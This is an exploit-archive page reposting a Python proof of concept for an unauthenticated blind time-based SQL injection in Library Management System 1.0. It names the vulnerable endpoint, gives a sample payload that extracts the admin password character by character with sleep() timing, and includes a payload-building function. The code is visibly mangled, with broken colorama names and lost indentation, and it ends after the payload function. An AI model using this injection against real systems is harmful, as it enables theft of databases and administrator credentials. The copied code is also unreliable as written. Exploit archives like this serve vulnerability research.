Exploits / Vulnerability Discovered : 2021-09-17 |
Type : webapps |
Platform : php
This exploit / vulnerability Library management system 1.0 blind timebased sql injection (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec)
# Date: 16/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip
# Vendor: breakthrough2
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.
# Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html
import requests,argparse
from colorama import (Fore as F, Back as B, Style as S)
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G')
proxies = {'http':'','https':''}
# POST /LibraryManagement/fine-student.php
# inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha
def sqliPayload(char,position,userid,column,table):
sqli = 'inject\' UNION SELECT IF(SUBSTRING('
sqli += str(column)+','
sqli += str(position)+',1) = \''
sqli += str(char)+'\',sleep(1),null) FROM '
sqli += str(table)+' WHERE adminId='
sqli += str(userid)+'; -- kamahamaha'
return sqli